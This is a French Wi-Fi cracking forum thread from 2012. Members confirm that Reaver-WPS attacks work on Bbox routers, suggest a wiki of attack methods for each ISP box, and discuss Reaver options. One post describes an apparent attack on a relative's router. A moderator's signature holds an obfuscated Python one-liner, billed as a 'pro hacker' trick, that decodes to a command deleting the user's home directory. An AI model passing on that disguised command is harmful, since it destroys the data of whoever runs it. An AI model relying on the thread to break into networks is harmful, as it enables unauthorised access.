Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 14-04-2012 16:43:39

manonyme
Membre

Confirmation de l'efficacité de reaver sur les Bbox et proposition...

Bon, après un test d'un ami bidouiller sur sa propre Bbox et d'une offensive lourde menée sur celle d'un membre de ma famille il y a longtemps, il semblerait qu'aucune Bbox ne soit maintenant à l'abris!
En effet, la version thomson présente déjà la très fameuse vulnérabilité mise en évidence par BBkeys, et d'après les 2 test en présence, la Sagem [email protected] 3504 semble parfaitement vulnérable à la faiblesse que Reaver-WPS exploite.
Bref, c'était juste pour participer un peu aux "stats", histoire de confirmer ou non ce qui peut se faire.

En deuxième lieu, je proposais à M1ck3y de mettre en place un wiki, que l'on puisse effiacement collecter l'intelligence collective du site: il existe maintenant une multitude de failles et de faiblesses propres À chaque Box, une multitude de méthode d'attaques, et il serait bon de les rassembler pour les catégoriser, les trier, les étoffer.
Personnelement je n'y vois aucun inconvénient, et je serai bien heureux de pouvoir y apporter ma contribution. Cela apporterai bien plus de clarté au site, permettra aux fénéants de faire plus rapidement une recherche, et le site pourra jouir d'une plus grand notoriété, car il me semble que les crawler de google réagissent mieux au contenu des wikis.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 14-04-2012 17:50:30

M1ck3y
Administrateur
Lieu : Lost in the darkness

Re : Confirmation de l'efficacité de reaver sur les Bbox et proposition...

On avait déja discuté de l'éventuelle mise en place d'un wiki il y a un moment: Un WIKI bien non ???. C'est vrai que depuis le forum a bien plus de membres, mais je pense qu'il est suffisamment bien structuré pour que l'on puisse y ajouter du contenu intéressant dans la section appropriée afin de pouvoir le retrouver très facilement grace au moteur de recherche intégré du site qui fonctionne plutot bien. Si il y a suffisamment de personnes qui veulent rédiger du contenu pour un wiki on en rediscutera wink

#3 15-04-2012 17:00:24

manonyme
Membre

Perso je serai archi chaud pour y participer (quand j'aurai du temps, ie, cet été). Ça permet d'avoir quand même une doc vachement plus structurée, et on peu découvrir des trucs (genre en parcourant la doc Aircrack je trouve souvent des trucs nouveaux que j'aurai pas pris l'initiative de chercher moi même... parce que je savais même pas que ça existait ><).

#4 16-04-2012 16:59:40

spawn
Modérateur

Je plusoie un peu, si ça peut aider les noobs à ne pas reposer les sempiternelles questions sur le negative-one et le handshake.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 24-04-2012 19:00:44

dancerock
N00b

je l'ai pas tester sur bbox, mais il ne marche pas du tout sur le livebox. Pour le réseau de numéricable, il est un peu délicat. Le reaver marche bien, mais c'est possible qu'on aura pas de Pin après un scan à fond. Cela a été vérifié par les internautes.

A suivre les gars

du côté de Freebox, l'option wps a été déactivé par une configuration par défaut.

Dernière modification par dancerock (24-04-2012 19:02:11)

#7 15-05-2012 19:16:06

manonyme
Membre

J'ai fouillé un peu dans les "issues" sur la page google-code de Reaver, apparament quand on fait un scan complet et que ça renvoie rien, c'est que l'AP est "défectueux"... enfin du moins son firmware.
En gros au lieu de refuser les requêtes d'identification EAPOL quand son seuil d'erreur a été dépassé, il accepte, mais renvoie par défaut "NACK" pour toute clée testée (même la bonne), donc reaver va "passer" sur la bonne clée sans le savoir.
Y'a aussi la possibilité d'utiliser l'option "-L" qui ignore les messages de lock, et à ce moment c'est reaver qui fait l'con (enfin celui qui a mit l'option).

Annonce